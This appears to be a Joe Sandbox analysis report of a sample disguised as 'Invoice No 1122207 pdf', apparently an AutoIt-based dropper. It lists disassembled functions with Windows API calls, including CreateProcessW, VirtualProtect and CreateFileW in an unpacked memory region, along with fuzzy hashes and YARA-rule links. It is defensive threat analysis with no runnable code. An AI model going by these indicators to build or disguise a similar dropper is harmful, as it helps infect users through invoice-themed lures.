Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: D%N$D%N$D%N$D%N$D%ND%N$Variable must be of type 'Object'.
API String ID: 0-465020055
Opcode ID: 2a58e2748ee99319076b8a79672c47910c224a4d0c0ca31162d8b2db74a70bf4
Instruction ID: df5a792558cdc67f6a9d26343e17f7f96aab77dab69aaa5edb3678b55f59b8b1
Opcode Fuzzy Hash: 2a58e2748ee99319076b8a79672c47910c224a4d0c0ca31162d8b2db74a70bf4
Instruction Fuzzy Hash: 24C2A179A00214DFCB14CF5AC880AAEB7B1BF08314F54856BED16AB351D379ED82CB59

Function 004110F3 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00411BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00411BF4
Part of subcall function 00411BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00411BFC
Part of subcall function 00411BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00411C07
Part of subcall function 00411BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00411C12
Part of subcall function 00411BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00411C1A
Part of subcall function 00411BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00411C22

Part of subcall function 00411B4A: RegisterWindowMessageW.USER32(00000004,?,004112C4), ref: 00411BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0041136A
OleInitialize.OLE32 ref: 00411388
CloseHandle.KERNEL32(00000000,00000000), ref: 004524AB

Strings

`, xrefs: 00411292
X, xrefs: 004111D2
, xrefs: 0041118A
`, xrefs: 004112C4

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: X$`$`$
API String ID: 1986988660-2398512554
Opcode ID: f027a6039df0b6a9ccfefb81605198734c514decc3f3f1bf7136d63f389a4569
Instruction ID: b84454b7ec4f0764e400905ca68859637c0bfc71ced587ec1fd0445a8f5a922f
Opcode Fuzzy Hash: f027a6039df0b6a9ccfefb81605198734c514decc3f3f1bf7136d63f389a4569
Instruction Fuzzy Hash: 807181B4991380AF8384EF7AA9C56A93AE4BB89344754853FD41ACB372E7344481CF4D

Function 01229240 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01229285

Memory Dump Source

Source File: 00000000.00000002.1270789897.0000000001228000.00000040.00000020.00020000.00000000.sdmp, Offset: 01228000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1228000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 5180030a56641000d2bd3dfd16e836e500105188001a9f19b087a7fb179acd89
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 45510975A60219FBEF20DFA4CC89FEE7778BF48714F108514F61AEA1C0DA7496858B60

Function 00412C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00412C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00412CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00411CAD,?), ref: 00412CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00411CAD,?), ref: 00412CCF

Strings

edit, xrefs: 00412CAC
AutoIt v3, xrefs: 00412C89, 00412C8E, 00412C8F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 2593c6742b82fe79092b42ec5e3f34119de21b5e21aa63ce0c963a6b0e605cb1
Instruction ID: 99052c86cc8cf3efcc0869b0853d3bb92962d71e3989a705adee18fcf6d74e1a
Opcode Fuzzy Hash: 2593c6742b82fe79092b42ec5e3f34119de21b5e21aa63ce0c963a6b0e605cb1
Instruction Fuzzy Hash: A5F03A759802D07AFB700713AC88E772EBDD7C7F50B00002AFD00AA5B1C2750840DAB8

Function 0122ACF0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0122ABE0: Sleep.KERNELBASE(000001F4), ref: 0122ABF1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0122AE27

Strings

37X2FEQAXSN89OHL9, xrefs: 0122AEA7, 0122AEAA

Memory Dump Source

Source File: 00000000.00000002.1270789897.0000000001228000.00000040.00000020.00020000.00000000.sdmp, Offset: 01228000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1228000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateFileSleep
String ID: 37X2FEQAXSN89OHL9
API String ID: 2694422964-622243362
Opcode ID: f1db29f150e4ec38b2a9b2ad863c15e9ba3cf856beba3a72c6c24e419ad8b26e
Instruction ID: 94d51f0b9bda401e78f0e3114bb94c85bcc51c213479a58a026aa90adade7639
Opcode Fuzzy Hash: f1db29f150e4ec38b2a9b2ad863c15e9ba3cf856beba3a72c6c24e419ad8b26e
Instruction Fuzzy Hash: 2451B430D14258EBEF11DBB4C855BEEBB79AF18700F004199E648BB6C0DBBA1B45CB65

Function 00413B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00413B0F,SwapMouseButtons,00000004,?), ref: 00413B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00413B0F,SwapMouseButtons,00000004,?), ref: 00413B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00413B0F,SwapMouseButtons,00000004,?), ref: 00413B83

Strings

Control Panel\Mouse, xrefs: 00413B3E

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 089459aa4bae07c699fe4cf93e00379ad960607a0c012dee4c00178955b40e5d
Instruction ID: efe99ebc86e2a43639fa0a45ccb95c55ad0c1e52a376fff70b7430767290cc3a
Opcode Fuzzy Hash: 089459aa4bae07c699fe4cf93e00379ad960607a0c012dee4c00178955b40e5d
Instruction Fuzzy Hash: 34112AB5515208FFDB208FA5DC84AEFBBB8EF05745B10446AA805D7211E235AE809768

Function 00413923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004533A2

Part of subcall function 00416B57: _wcslen.LIBCMT ref: 00416B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00413A04

Strings

Line: , xrefs: 004533EB

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 5917f63d494f4efd6840c6c102d560cb1729d56b07ba3a0247c2c6c7a1b2314d
Instruction ID: 64eb98bd1e8a2c6d8bf1d1448a80795433b550d303183492142cb03938254339
Opcode Fuzzy Hash: 5917f63d494f4efd6840c6c102d560cb1729d56b07ba3a0247c2c6c7a1b2314d
Instruction Fuzzy Hash: 6E31E571448304AAD321EF20DC45BEBB7D8AF44719F10092FF999931A1DB789A89C7CE

Function 00412DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00452C8C

Part of subcall function 00413AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00413A97,?,?,00412E7F,?,?,?,00000000), ref: 00413AC2

Part of subcall function 00412DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00412DC4

Strings

`eM, xrefs: 00452C85
X, xrefs: 00452C5A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`eM
API String ID: 779396738-3105956497
Opcode ID: 007bc4fc2ed29e8fa6074b4542330180b982ea32c1c1f0f6e4dc116566c22c30
Instruction ID: 60189ebbf70a092f4650bb241f0bb35d40b29c1db4a319a09a0ab6a936fb48da
Opcode Fuzzy Hash: 007bc4fc2ed29e8fa6074b4542330180b982ea32c1c1f0f6e4dc116566c22c30
Instruction Fuzzy Hash: F221C671A00258ABDB41DF95D8457EE7BF89F49305F00805BE405E7341DBFC55898F69

Function 0042FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00430668

Part of subcall function 004332A4: RaiseException.KERNEL32(?,?,?,0043068A,?,004E1444,?,?,?,?,?,?,0043068A,00411129,004D8738,00411129), ref: 00433304

__CxxThrowException@8.LIBVCRUNTIME ref: 00430685

Strings

Unknown exception, xrefs: 00430692

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: b551130031b052c89cf02811130fdb718ec7dc0df733e74342b307bea5651ac1
Instruction ID: 8a9ef89cd59e2d12a381263514402eb75b796a092c879378687861d6288dc8f0
Opcode Fuzzy Hash: b551130031b052c89cf02811130fdb718ec7dc0df733e74342b307bea5651ac1
Instruction Fuzzy Hash: CBF0283090020C73CB00FAA6E856D9F777C5E04314FA0423BB814D16D5EF78DA59C58C

Function 01229920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01229965
ExitProcess.KERNEL32(00000000), ref: 01229984

Strings

D, xrefs: 01229931

Memory Dump Source

Source File: 00000000.00000002.1270789897.0000000001228000.00000040.00000020.00020000.00000000.sdmp, Offset: 01228000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1228000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
Instruction ID: 9a26ec8a46611185a1e7afbde968dafa0b56eb10b2d0ddac001efadee9565fc8
Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
Instruction Fuzzy Hash: 4BF019B1510259ABDF20DFE0CC49FEE777CBB04705F408508FA0A9A584DA7996088B61

Function 00497F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004982F5
TerminateProcess.KERNEL32(00000000), ref: 004982FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 004984DD

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: c947f721ee736bd942256086f751f6936d7c1c779fd5c1a13930af7353b322d7
Instruction ID: ef430361c258ac756dc29d9a6bb75ae77488d2dd11d274fb921fe0a47db77fb7
Opcode Fuzzy Hash: c947f721ee736bd942256086f751f6936d7c1c779fd5c1a13930af7353b322d7
Instruction Fuzzy Hash: F6126E71A083019FCB14DF28C484B5ABBE5BF85318F04896EE8998B352DB35ED45CF96

Function 004486AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,004485CC,?,004D8CC8,0000000C), ref: 00448704
GetLastError.KERNEL32(?,004485CC,?,004D8CC8,0000000C), ref: 0044870E
__dosmaperr.LIBCMT ref: 00448739

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: cce0ef7157022dc22e8da79089ef6260ca41a62ec3158b915f3db859766f3306
Instruction ID: ea73b3928fc640aac435520ba355ecc7594b0d5115cddce301038186b9cb4e05
Opcode Fuzzy Hash: cce0ef7157022dc22e8da79089ef6260ca41a62ec3158b915f3db859766f3306
Instruction Fuzzy Hash: CA016F3360416027FAA16634588577F27594B92778F36011FFC148B2D3DDAC8C81815C

Function 00421310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004217F6

Strings

CALL, xrefs: 004217C6

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 5544c4cdc60f481544a1b734b8eb61d37f9e350eccdebff11711be97dbcee23c
Instruction ID: a776517bb2fe5df75cedd954906f4bafdafd1e5466ba507881bd09a3726e9400
Opcode Fuzzy Hash: 5544c4cdc60f481544a1b734b8eb61d37f9e350eccdebff11711be97dbcee23c
Instruction Fuzzy Hash: 7422CE706083119FC714DF15E480B2ABBF1BF95308F54896EF8868B361D779E885CB8A

Function 00414ECB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00414E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00414EDD,?,x,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00414E9C
Part of subcall function 00414E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00414EAE
Part of subcall function 00414E90: FreeLibrary.KERNEL32(00000000,?,?,00414EDD,?,x,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00414EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,x,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00414EFD

Part of subcall function 00414E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00453CDE,?,x,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00414E62
Part of subcall function 00414E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00414E74
Part of subcall function 00414E59: FreeLibrary.KERNEL32(00000000,?,?,00453CDE,?,x,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00414E87

Strings

x, xrefs: 00414ED1

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID: x
API String ID: 2632591731-2890206012
Opcode ID: 7105be3e625b6789eedda4a0fb4253c0138869e0127055b4b7711cd55418853a
Instruction ID: 900f2c9c90345bbf6c8c6cc6d72cff397e7799e8d9f53e8a554612d68bf07ed7
Opcode Fuzzy Hash: 7105be3e625b6789eedda4a0fb4253c0138869e0127055b4b7711cd55418853a
Instruction Fuzzy Hash: 39112732600305ABCF11BF62DD02FED77A4AF80715F10842FF442AA2C1DE789A86D758

Function 00413837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00413908

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: fd78e65f647e565f40d04c310ccd18759a714ca5127559965ce8409613bfb067
Instruction ID: 056957f1de2ae35761f1b6e384e14098924950fae4bfab9b2b904b30d0ce5a52
Opcode Fuzzy Hash: fd78e65f647e565f40d04c310ccd18759a714ca5127559965ce8409613bfb067
Instruction Fuzzy Hash: 7B31AEB06043009FE320EF65D8847D7BBE8FB49709F00092FF99987251E775AA84CB5A

Function 00415745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0041949C,?,00008000), ref: 00415773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0041949C,?,00008000), ref: 00454052

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 67341edec8ec87bb56232967f01494a07e280b8fd32881c5187a37eb5c93776a
Instruction ID: 3a8ad08046c532380c9a1ad267cdf153108677a00f414868c479c8983809bdea
Opcode Fuzzy Hash: 67341edec8ec87bb56232967f01494a07e280b8fd32881c5187a37eb5c93776a
Instruction Fuzzy Hash: 70018430245225F6E3310A26CC0EFD77F54DF42774F108311BA6C5A1E1CBB85495CB94

Function 0049709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 795d27ed6c19aa2610278be24a95b81f3dd6b5985c51b6932281f5735478b767
Instruction ID: 05527a9cf27f398b3aeeedf138963ae1d7cc88bf14a301ba410fa7c988364de8
Opcode Fuzzy Hash: 795d27ed6c19aa2610278be24a95b81f3dd6b5985c51b6932281f5735478b767
Instruction Fuzzy Hash: 72D17F30A14109EFCF14DF99C4819EEBBB5FF48314F14406AE905AB391E734AD82CB99

Function 01229990 Relevance: 1.7, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 01229200: GetFileAttributesW.KERNELBASE(?), ref: 0122920B

CreateDirectoryW.KERNELBASE(?,00000000), ref: 01229AE3

Memory Dump Source

Source File: 00000000.00000002.1270789897.0000000001228000.00000040.00000020.00020000.00000000.sdmp, Offset: 01228000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1228000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 939d58dd18ac71c44f8944125d08cff76a962453843d26beae98b34d1b6cc903
Instruction ID: 25055d6ef8e7ec2268915571b37a9f37c39822a4144635dcf99a09d4f4167887
Opcode Fuzzy Hash: 939d58dd18ac71c44f8944125d08cff76a962453843d26beae98b34d1b6cc903
Instruction Fuzzy Hash: E9517431A21219A7EF14EFA4C854BEF7339EF58300F108568E609F7290EB799B45C765

Function 0042FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0042FD1F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: b744a39fad4ab2061ba55eaee4e2f86fd8c2406d33c11e09e92a57a5279eb257
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
